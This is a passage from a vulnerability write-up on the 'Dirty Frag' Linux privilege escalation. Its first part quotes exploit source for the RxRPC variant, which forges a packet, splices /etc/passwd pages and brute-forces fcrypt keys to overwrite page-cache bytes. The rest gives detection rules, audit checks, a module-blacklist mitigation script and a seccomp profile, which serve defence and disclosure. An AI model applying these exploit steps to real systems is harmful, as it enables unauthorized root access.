/* Step 5: compute the wire cksum the forged DATA packet must carry.
   Uses AF_ALG pcbc(fcrypt) in userspace — no kernel modification.
   Two PCBC-encrypt operations: first to get csum_iv, then the actual
   cksum. This precomputation is what lets the forged packet sail past
   rxkad_verify_packet()'s cksum check and reach verify_packet_1(). */
compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv);
compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h);

RxRPC Variant: Splice Trigger and the In-Place Decrypt

With the cksum precomputed and the connection live, the exploit sends the forged DATA packet with /etc/passwd's page cache page in its frag — exactly the same splice pattern as the ESP variant, just targeting a different file and using UDP instead of the XFRM SA receive path:

Cexp.c — do_one_trigger() splice and recv
/* Build forged DATA wire header with precomputed cksum */
struct rxrpc_wire_header mal = {0};
mal.type       = RXRPC_PACKET_TYPE_DATA;   /* 1 */
mal.flags      = RXRPC_LAST_PACKET;
mal.securityIndex = 2;                    /* RXKAD */
mal.cksum      = htons(cksum_h);          /* precomputed — passes first verify */
/* ... epoch, cid, callNumber from the real handshake ... */

/* connect udp_srv → client port so splice can send via a connected socket */
connect(udp_srv, &dst_cli, sizeof(dst_cli));

/* vmsplice: wire header (28 bytes) into pipe — normal copy from local struct */
vmsplice(p[1], &viv, 1, 0);

/* splice: 8 bytes of /etc/passwd at file offset splice_off into the pipe.
   Zero-copy — page cache page P of /etc/passwd is now in the pipe frag. */
loff_t off = splice_off;
splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK);

/* splice: pipe → udp_srv (connected to client). MSG_SPLICE_PAGES is set
   automatically because splice() to a socket uses that path.
   Page cache page P of /etc/passwd is now in the skb's frag[0]. */
splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0);

/* recvmsg on rxsk_cli: the client's kernel RxRPC stack picks up the
   forged DATA packet. It passes rxkad_verify_packet()'s cksum check,
   then reaches rxkad_verify_packet_1() which does in-place
   pcbc(fcrypt) decrypt — writing fcrypt_decrypt(C, K) into page P
   at offset splice_off. Returns -EPROTO, but the STORE is done. */
recvmsg(rxsk_cli, &m, 0);

RxRPC Variant: Userspace fcrypt Brute-Force — How It Actually Works

This is the most technically interesting part of the exploit, and the part most commonly described incorrectly in secondary sources. Here is exactly what the code does.

The problem: The 8 bytes that the kernel will STORE into the page cache are fcrypt_decrypt(C, K) — where C is the 8 bytes currently at the target file offset, and K is the 8-byte session key the attacker plants in the RxRPC token. The attacker controls K freely but cannot choose the STORE value directly — they must find a K whose decryption of C produces the desired plaintext bytes.

The search strategy: The code does not iterate keys sequentially from 0. Instead, it uses a splitmix64 PRNG — a high-quality, fast pseudo-random number generator — seeded from the current time XOR the PID, then generates random 8-byte keys and tests each one against the userspace fcrypt implementation:

Cexp.c — brute-force core loop (actual code)
static uint64_t fc_splitmix64(uint64_t *s) {
    uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

for (uint64_t iter = 0; iter < max_iters; iter++) {
    uint64_t r = fc_splitmix64(&seed);  /* random 8-byte key */
    memcpy(K, &r, 8);
    fcrypt_user_setkey(&ctx, K);
    fcrypt_user_decrypt(&ctx, P, C);  /* P = fcrypt_decrypt(C, K) */
    if (check(P)) { /* does P match our target predicate? */
        memcpy(K_out, K, 8); memcpy(P_out, P, 8);
        return 0;
    }
}

The target predicates and their probability: The code's comments directly state the success probability for each of the three searches — these come from the structure of the constraints:

Cexp.c — predicate checks with probabilities from comments
/* K_A: P[0]==':' AND P[1]==':'  →  prob ~1.5e-5  (≈ 1 in 65,536)
   Expected: ~65,536 iterations. At 18M/s → < 4ms */
static inline int fc_check_pa_nullok(const uint8_t P[8]) {
    return P[0] == ':' && P[1] == ':';
}

/* K_B: P[0]=='0' AND P[1]==':'  →  prob ~1.5e-5  (≈ 1 in 65,536)
   Expected: ~65,536 iterations. At 18M/s → < 4ms */
static inline int fc_check_pb_nullok(const uint8_t P[8]) {
    return P[0] == '0' && P[1] == ':';
}

/* K_C: P[0]=='0', P[1]==':', P[7]==':',
        P[2..6] ≠ ':', '\0', '\n'        →  prob ~5.4e-8  (≈ 1 in 18.5M)
   Expected: ~18.5M iterations. At 18M/s → ~1 second */
static inline int fc_check_pc_nullok(const uint8_t P[8]) {
    if (P[0] != '0' || P[1] != ':' || P[7] != ':') return 0;
    for (int i = 2; i < 7; i++)
        if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return 0;
    return 1;
}

K_A and K_B only constrain 2 bytes of the 8-byte output (probability ~1/256² ≈ 1 in 65,536), so they are found in milliseconds. K_C constrains 4 specific byte values plus 5 bytes being "not colon, not null, not newline", giving a probability of about 1 in 18.5 million — found in roughly one second at 18 million keys/second.

The chained-ciphertext correction: After splice A fires, the bytes at /etc/passwd offset 6 are no longer the original file bytes — they are whatever Pa_out[2..7] wrote there. So when the code searches for K_B, it cannot use the original Cb read from disk. It must construct Cb_actual from the plaintext already written by splice A:

Cexp.c — chained ciphertext correction (actual code)
/* After splice A fires at offset 4 (8 bytes), bytes 6..11 now hold Pa_out[2..7].
   Bytes 12..13 (= Cb[6..7]) are still original — splice A didn't reach them.
   Cb_actual is what splice B's kernel decrypt will see as its ciphertext. */
memcpy(Cb_actual, Pa_out + 2, 6);
memcpy(Cb_actual + 6, Cb + 6, 2);
/* Search K_B against Cb_actual, not the original Cb */
find_K_offline_generic(Cb_actual, max_iters, fc_check_pb_nullok, Kb, Pb_out, ...);

/* Same correction for splice C: after B fires at offset 6, bytes 8..13
   now hold Pb_out[2..7]. Bytes 14..15 (= Cc[6..7]) are still original. */
memcpy(Cc_actual, Pb_out + 2, 6);
memcpy(Cc_actual + 6, Cc + 6, 2);
find_K_offline_generic(Cc_actual, max_iters, fc_check_pc_nullok, Kc, Pc_out, ...);

All three key searches happen entirely in userspace with no kernel interaction. Only after all three keys are found does the exploit fire the three kernel triggers in order. The entire brute-force stage completes in well under 2 seconds on a modern CPU.

The fcrypt implementation: The exploit embeds a complete port of the Linux kernel's crypto/fcrypt.c (originally by David Howells / KTH) as static C code — four 256-entry S-box tables, key schedule generation, and a 16-round Feistel decrypt function. It includes a built-in self-test verified against known kernel test vectors before the brute-force begins. If the selftest fails, the RxRPC path aborts cleanly rather than producing garbage output.


Detection Strategies

Like Copy Fail, Dirty Frag leaves nothing on disk and issues no write() syscalls to the target file. Detection has to focus on behavioral signals: the specific syscall patterns, module load events, and network activity that the exploit produces as a side effect.

One thing worth noting from the code: the ESP path runs inside a forked child process that calls unshare() and registers XFRM SAs, while the RxRPC path runs in the main process with no namespace changes. An EDR that tracks process trees will see different parent-child relationships for each variant. The default binary also suppresses its own stderr via dup2(/dev/null), so no console output is produced under normal execution.

SignalDetects?Notes
sha256sum / rpm -V / AIDE / TripwireNoAll compare on-disk content only. Page cache modifications are completely invisible to them.
auditd write() syscall auditingNoThe STORE happens inside the kernel's crypto scatter-gather walk, not through any write() syscall.
EDR on-access file scannersNoThese hook write syscalls. Since no write syscall occurs, nothing triggers.
XFRM SA registration via NETLINK_XFRMYes (ESP)The exploit sends XFRM_MSG_NEWSA from a non-VPN process. Rare in legitimate workloads.
unshare(CLONE_NEWUSER|CLONE_NEWNET)Yes (ESP)The ESP child calls this before SA registration. Combine with subsequent XFRM activity for high confidence.
add_key("rxrpc", ...) from unexpected processYes (RxRPC)No legitimate user process adds RxRPC keys outside of an AFS client. Any unexpected occurrence is high signal.
socket(AF_RXRPC) from unexpected processYes (RxRPC)AF_RXRPC is socket family 33. The exploit opens one per trigger. Extremely rare outside AFS environments.
rxrpc or esp4 module loaded unexpectedlyWeakUseful as a baseline check on servers that never use IPsec or AFS. Not reliable alone.
In-memory page cache auditYesCompare live page cache of setuid binaries against their on-disk content. A mismatch at offset 0x78 of /usr/bin/su is definitive.
Defender for Linux hash signaturesPartialDetects the known PoC binary. Bypassed trivially by recompiling with any code change.

Falco Rules

The most practical open-source detection approach is monitoring for the specific syscall combinations the exploit produces. Neither variant's individual syscalls is alarming in isolation, but the combination with the target process context is distinctive:

YAMLfalco-dirtyfrag.yaml
- rule: Dirty Frag ESP - XFRM SA from non-VPN process
  desc: Detects XFRM_MSG_NEWSA netlink from a process that is not a known VPN daemon (CVE-2026-43284)
  condition: evt.type = sendmsg
    and fd.type = netlink
    and evt.arg.msg contains xfrm_sa
    and not proc.name in (strongswan, charon, libreswan, ipsec, pluto)
  output: "XFRM SA from unexpected process %proc.name (user=%user.name pid=%proc.pid)"
  priority: CRITICAL
  tags: [CVE-2026-43284, lpe, dirtyfrag]

- rule: Dirty Frag RxRPC - add_key rxrpc from unexpected process
  desc: Detects add_key("rxrpc") from a non-AFS process (CVE-2026-43500)
  condition: evt.type = add_key
    and evt.arg.type = "rxrpc"
    and not proc.name in (afsd, kafs)
  output: "rxrpc key added by unexpected process %proc.name (user=%user.name pid=%proc.pid)"
  priority: CRITICAL
  tags: [CVE-2026-43500, lpe, dirtyfrag]

- rule: Dirty Frag - socket(AF_RXRPC) from unexpected process
  desc: Detects AF_RXRPC socket creation outside AFS context (both CVEs)
  condition: evt.type = socket
    and evt.arg.domain = 33
    and not proc.name in (afsd, kafs)
  output: "AF_RXRPC socket from unexpected process %proc.name (user=%user.name pid=%proc.pid)"
  priority: WARNING
  tags: [CVE-2026-43500, lpe, dirtyfrag]

auditd Rules

The unshare filter below uses the flag value 0x40000000 which is CLONE_NEWNET. The ESP path calls unshare(CLONE_NEWUSER | CLONE_NEWNET) which equals 0x10000000 | 0x40000000 = 0x50000000. Filtering on a0=0x50000000 catches the exact combination used by the exploit while reducing false positives from processes that unshare only a user namespace:

Bash/etc/audit/rules.d/dirtyfrag.rules
# ESP variant: unshare(CLONE_NEWUSER|CLONE_NEWNET) = 0x50000000
-a always,exit -F arch=b64 -S unshare -F a0=0x50000000 -k dirtyfrag_esp

# RxRPC variant: any add_key call (filter by key type in ausearch)
-a always,exit -F arch=b64 -S add_key -k dirtyfrag_rxrpc

# Search for hits:
# ausearch -k dirtyfrag_esp
# ausearch -k dirtyfrag_rxrpc | grep rxrpc

Post-Exploitation: Detecting the Page Cache Modification

If you suspect a system has already been compromised, the most reliable check is to compare the live page cache content of /usr/bin/su against its on-disk content. A mismatch means the page cache was modified without going through the normal write path. The simplest way to do this is to drop the page cache and then compare:

Bashcheck for page cache modification
# Step 1: hash the current in-memory version (reads from page cache)
sha256sum /usr/bin/su

# Step 2: drop page cache and re-hash (forces re-read from disk)
echo 3 | sudo tee /proc/sys/vm/drop_caches > /dev/null
sha256sum /usr/bin/su

# If the two hashes differ, the page cache was modified without
# touching the disk. This is the Dirty Frag / Copy Fail fingerprint.
# You can also check the specific marker bytes at offset 0x78:
xxd -s 0x78 -l 8 /usr/bin/su
drop_caches is disruptive in production Running echo 3 > /proc/sys/vm/drop_caches on a busy server will cause a sudden spike in disk I/O as all cached file data is re-read from disk. On systems with large working sets this can cause a brief performance impact. Do it during a maintenance window or use targeted per-file cache inspection tools if available.

Mitigation — Check and Patch Now

Patch Status

The xfrm-ESP fix (CVE-2026-43284) is commit f4c50a4034e6 in the netdev/net tree, merged May 7, 2026. It sets the SKBFL_SHARED_FRAG flag on pages that enter via splice() in the IPv4/IPv6 datagram append paths, and modifies the skip_cow branch in esp4_input and esp6_input to check that flag — routing any skb with externally-pinned pages through the safe skb_cow_data() path.

The RxRPC fix (CVE-2026-43500) is a submitted patch (lore.kernel.org afKV2zGR6rrelPC7@v4bel) that adds || skb->data_len to the clone-check gate in call_event.c and conn_event.c, ensuring non-linear skbs also go through skb_copy() before in-place decrypt. It has not yet been merged into any mainline or stable tree.

No distribution has shipped either fix through standard update channels as of May 8, 2026.

Immediate Mitigation — Blacklist the Three Modules

The attack surface for both variants can be removed by blacklisting the three kernel modules involved. This does not affect standard disk encryption (LUKS/dm-crypt), TLS, or OpenSSL. Do not apply this on hosts that terminate or transit IPsec tunnels (strongSwan, Libreswan) — disabling esp4/esp6 will break the IPsec data path on those machines. For all other servers, this is a safe and immediate fix.

This is the exact mitigation command from the official researcher disclosure and confirmed by CloudLinux, AlmaLinux, and Red Hat advisories:

sudo sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

After applying the module blacklist, also flush the page cache. This is a separate but important step: if the exploit was already run on your system before the blacklist was in place, the page cache may still contain poisoned in-memory versions of system binaries. Flushing it forces all files to be re-read from the clean on-disk copies on next access:

sudo sh -c "echo 3 > /proc/sys/vm/drop_caches"
Note — "Copy Fail 2: Electric Boogaloo" alias An earlier proof-of-concept repository published as "Copy Fail 2: Electric Boogaloo" refers to the same Dirty Frag vulnerability under a different name. There is no separate CVE for it. The canonical PoC is github.com/V4bel/dirtyfrag by Hyunwoo Kim. The same mitigation applies regardless of which name you encounter.

Automated Check & Patch Script

Bashdirtyfrag-patch.sh
#!/usr/bin/env bash
# CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) — Checker & Patcher
# Blacklists esp4, esp6, rxrpc to remove Dirty Frag attack surface.
# Drops page cache to flush any prior exploitation.
# Safe on non-IPsec, non-AFS servers. Idempotent.

set -euo pipefail

RED='\033[0;31m'; GREEN='\033[0;32m'; YELLOW='\033[1;33m'
CYAN='\033[0;36m';  BOLD='\033[1m';    NC='\033[0m'
CONF="/etc/modprobe.d/dirtyfrag.conf"
MODS=("esp4" "esp6" "rxrpc")

banner() {
  echo -e "${CYAN}"
  echo "  ╔═══════════════════════════════════════════════════╗"
  echo "  ║  CVE-2026-43284/43500 · Dirty Frag · Checker v1.0 ║"
  echo "  ╚═══════════════════════════════════════════════════╝"
  echo -e "${NC}"
}

check_root() {
  [[ $EUID -eq 0 ]] || { echo -e "${YELLOW}[!] Re-run with sudo to apply fixes.${NC}"; }
}

check_mitigation_applied() {
  [[ -f "$CONF" ]] && grep -q esp4 "$CONF" && grep -q rxrpc "$CONF"
}

check_modules() {
  echo -e "${BOLD}[*] Module status:${NC}"
  for mod in "${MODS[@]}"; do
    if lsmod 2>/dev/null | grep -q "^${mod}"; then
      echo -e "  ${RED}[✗] ${mod} is LOADED${NC}"
    elif modinfo "$mod" &>/dev/null; then
      echo -e "  ${YELLOW}[!] ${mod} available but not loaded${NC}"
    else
      echo -e "  ${GREEN}[✓] ${mod} not available on this system${NC}"
    fi
  done
}

apply_patch() {
  printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > "$CONF"
  echo -e "${GREEN}[✓] Created ${CONF}${NC}"
  for mod in "${MODS[@]}"; do
    modprobe -r "$mod" 2>/dev/null \
      && echo -e "${GREEN}[✓] Unloaded ${mod}${NC}" \
      || echo -e "${YELLOW}[i] ${mod} was not loaded${NC}"
  done
  echo 3 > /proc/sys/vm/drop_caches
  echo -e "${GREEN}[✓] Page cache flushed${NC}"
  echo
  echo -e "${GREEN}${BOLD}[✓] MITIGATED — esp4, esp6, rxrpc blocked. Page cache cleared.${NC}"
  echo -e "${CYAN}[i] Remove ${CONF} after your distro ships patched kernels.${NC}"
}

main() {
  banner; check_root; echo
  echo -e "${BOLD}[*] Kernel: $(uname -r)${NC}"; echo
  check_modules; echo

  if check_mitigation_applied; then
    echo -e "${GREEN}${BOLD}[✓] Mitigation already in place — ${CONF}${NC}"
    exit 0
  fi

  echo -e "${RED}${BOLD}[!] VULNERABLE: Dirty Frag (CVE-2026-43284 / CVE-2026-43500)${NC}"
  echo -e "${RED}    Public PoC available. Any local user can become root.${NC}"; echo

  if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}[!] Run as root to apply: sudo $0${NC}"; exit 1
  fi

  read -rp "$(echo -e "${YELLOW}Apply mitigation now? [y/N]: ${NC}")" CONFIRM
  [[ "$CONFIRM" =~ ^[Yy]$ ]] && apply_patch || echo -e "${YELLOW}[!] Not applied. System remains vulnerable.${NC}"
}

main "$@"
chmod +x dirtyfrag-patch.sh && sudo ./dirtyfrag-patch.sh

Container and Kubernetes Hardening

The ESP variant can escape container boundaries via the shared page cache, just like Copy Fail. A seccomp profile blocking unshare() with CLONE_NEWUSER prevents the ESP variant from running inside containers. To block both variants, also restrict add_key with type "rxrpc":

JSONseccomp-deny-dirtyfrag.json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["unshare"],
      "action": "SCMP_ACT_ERRNO",
      "args": [{"index": 0, "value": 1073741824, "op": "SCMP_CMP_MASKED_EQ", "valueTwo": 1073741824}]
    },
    {
      "names": ["add_key"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
Track Patch Status xfrm-ESP fix: commit f4c50a4034e6 (netdev/net tree). RxRPC fix: pending merge, see lore.kernel.org patch. Distro trackers: Ubuntu (ubuntu.com/security/CVE-2026-43284), RHEL (access.redhat.com), AlmaLinux (almalinux.org). Until patched kernels land in your package manager, the module blacklist is the correct mitigation.

References & Further Reading

Primary Source github.com/V4bel/dirtyfrag
Dirty Frag — Official Disclosure, PoC, and Write-up by Hyunwoo Kim

The complete technical write-up (write-up.md), exploit source (exp.c), and disclosure timeline. Includes the full root cause analysis of both the ESP and RxRPC variants, exploit flow diagrams, and the submitted upstream patches.

Upstream Patch kernel.org
Kernel Fix: f4c50a4034e6 — SKBFL_SHARED_FRAG check in esp_input / esp6_input

The merged fix for CVE-2026-43284. Sets SKBFL_SHARED_FRAG in the IPv4/IPv6 datagram append paths when splice() supplies pages, and checks this flag in esp_input()/esp6_input() to force the safe skb_cow_data() path for externally-pinned pages.

Research bleepingcomputer.com
BleepingComputer — New Linux 'Dirty Frag' Zero-Day Gives Root on All Major Distros

Coverage of the public disclosure event including the broken embargo context, CVSS scoring, and affected distribution summary.

Advisory almalinux.org
AlmaLinux — Dirty Frag (CVE-2026-43284, CVE-2026-43500) Patched Kernels in Testing

AlmaLinux's advisory covering both CVEs, per-release impact analysis (AlmaLinux 8 is unaffected by the RxRPC variant as it does not build rxrpc.ko), and links to testing repository kernels.

Advisory access.redhat.com
Red Hat Security Bulletin RHSB-2026-003 — Dirty Frag Networking Subsystem LPE

Red Hat's official bulletin covering RHEL 8, 9, and 10 impact, configuration-based mitigations, and the expedited fix timeline.

Disclosure openwall.com
oss-security: Hyunwoo Kim — Full Dirty Frag Public Disclosure (2026-05-07)

The canonical public disclosure post on the oss-security mailing list, published after the embargo was broken by a third party. Contains the full technical description, timeline, and links to patches. This is the primary source all vendor advisories reference.

Related copy.fail
Copy Fail (CVE-2026-31431) — The Predecessor That Motivated Dirty Frag Research

The Copy Fail disclosure by Taeyang Lee that directly motivated Hyunwoo Kim's research into related page-cache write primitives in other kernel subsystems. Understanding Copy Fail is essential context for Dirty Frag. Dirty Frag exploits the same authencesn_decrypt() sink via a different entry path, and bypasses the Copy Fail mitigation entirely.